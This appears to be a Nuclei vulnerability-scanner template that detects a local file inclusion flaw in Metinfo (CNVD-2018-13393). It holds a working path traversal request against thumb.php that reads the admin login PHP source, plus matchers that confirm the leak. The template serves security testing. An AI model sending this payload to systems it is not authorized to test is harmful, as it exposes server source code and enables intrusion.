33 lines
759 B
YAML
33 lines
759 B
YAML
id: CNVD-2018-13393
|
|
|
|
info:
|
|
name: Metinfo - Local File Inclusion
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: Metinfo is susceptible to local file inclusion.
|
|
reference:
|
|
- https://paper.seebug.org/676/
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cwe-id: CWE-22
|
|
tags: metinfo,cnvd,cvnd2018,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<?php"
|
|
- "login_met_cookie($metinfo_admin_name);"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/07/05
|